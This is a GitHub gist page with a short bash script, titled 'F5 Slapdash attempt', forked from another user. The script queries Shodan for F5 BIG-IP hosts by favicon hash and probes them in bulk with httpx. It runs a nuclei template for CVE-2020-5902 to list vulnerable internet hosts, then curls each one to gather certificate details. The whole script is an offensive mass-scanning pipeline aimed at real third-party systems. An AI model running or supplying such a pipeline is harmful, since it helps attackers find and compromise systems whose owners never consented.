Muhammad Ahsan hunter0x8
hunter0x8
/ f5_here_i_come.sh
Created
July 7, 2020 16:02
— forked from LuD1161/f5_here_i_come.sh
F5 Slapdash attempt
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get all the F5 IPs from Shodan | Get script here : https://gist.github.com/LuD1161/2087aea80e8771a4af069c33b4078570 | |
| python3 shodan_query.py "http.favicon.hash:-335242539" results_f5.txt | tee -a output.txt | |
| cat output.txt | grep -i "host :" | cut -d":" -f2 | cut -d" " -f2 | httpx -threads 400 -ports 80,443,8443,4443 -silent | nuclei -t cves/CVE-2020-5902.yaml -o results.txt | |
| cut -d" " -f3 results.txt > targets.txt | |
| sed -i -e "s/\.\;/\.\\\;/g" targets.txt # escape semicolon to pass to interlace | |
| interlace -tL ./targets.txt -threads 100 -c "echo _target_; curl --insecure -v _target_ 2>&1 | awk 'BEGIN { cert=0 } /^\* SSL connection/ { cert=1 } /^\*/ { if (cert) print }'" -v | tee -a all_certs.txt |
NewerOlder